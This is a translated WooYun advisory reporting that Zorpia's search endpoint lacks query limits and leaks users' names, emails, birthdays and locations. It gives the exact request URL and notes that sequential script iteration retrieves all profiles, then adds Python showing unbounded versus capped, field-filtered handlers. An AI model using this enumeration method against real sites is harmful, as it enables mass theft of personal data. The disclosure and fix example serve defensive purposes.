Vulnerability Summary

Defect ID: wooyun-2014-057386

Title: Zorpia (若比邻): lax interface restrictions allow retrieving all user profile data (name, birthday, account, email, geographic location, etc.)

Affected vendor: 若比邻 (Zorpia)

Reporter: 路人甲

Submitted: 2014-04-17 11:47

Fix deadline: 2014-06-01 11:48

Published: 2014-06-01 11:48

Vulnerability type: mass user data leakage

Severity: low

Self-assessed rank: 1

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-04-17: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-06-01: the vendor has chosen to ignore the vulnerability; details disclosed to the public

Brief description:

No maximum query limit is enforced.

Detailed description:

http://zorpia.com/search/zorpians?ajax_search=1&keyword_quote=&start=33&update_criteria=1&pool=0&order=attractive&online=&country=Algeria&state=&city=&gender=female&age_from_search=18&age_to_search=25&_=727
This page returns JSON data that contains the user's name, email, age and interests.

Proof of vulnerability:

By iterating sequentially with a script, all user profiles can be retrieved.

Columns of the retrieved data: user name, date of birth, account, email, login location

Suggested fix:

Enforce a limit on the query count.
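Added example (not Zorpia's code and not from the report): a model of the search handler described above, with the unbounded version beside one that caps the offset window and page size and returns only an allow-listed subset of fields. The `count` parameter, the field names, the caps and the sample rows are assumptions.

```python
from urllib.parse import parse_qs

# Constructed sample rows standing in for the site's user table (not real data).
PROFILES = [
    {"id": 100 + i, "name": f"user{i}", "account": f"acct{i}",
     "email": f"user{i}@example.invalid", "birthday": "1990-01-01", "age": 30}
    for i in range(500)
]

PUBLIC_FIELDS = ("id", "name", "age")  # assumed: all a search listing needs to show
MAX_PAGE_SIZE = 20                      # assumed cap on rows per request
MAX_OFFSET = 200                        # assumed deepest offset served to a search client


def search_unbounded(query_string):
    """Mirrors the reported behaviour: any offset and count, full records returned."""
    q = parse_qs(query_string)
    start = int(q.get("start", ["0"])[0])
    count = int(q.get("count", ["30"])[0])
    return PROFILES[start:start + count]


def search_hardened(query_string):
    """Same endpoint with a bounded paging window and a field allow-list."""
    q = parse_qs(query_string)
    try:
        start = int(q.get("start", ["0"])[0])
        count = int(q.get("count", [str(MAX_PAGE_SIZE)])[0])
    except ValueError:
        raise ValueError("start and count must be integers")
    if start < 0 or count < 1:
        raise ValueError("start or count out of range")
    if start > MAX_OFFSET:
        # Refuse rather than clamp: deep paging becomes a loggable error
        # instead of silently serving the whole table a page at a time.
        raise ValueError(f"start exceeds the {MAX_OFFSET}-row search window")
    count = min(count, MAX_PAGE_SIZE)
    rows = PROFILES[start:start + count]
    next_start = start + count
    return {
        # Project each row onto the public subset so email and birthday never leave the server.
        "results": [{k: r[k] for k in PUBLIC_FIELDS} for r in rows],
        "has_more": next_start <= MAX_OFFSET and next_start < len(PROFILES),
    }
```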

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

The vendor could not be reached, or the vendor actively rejected the report.

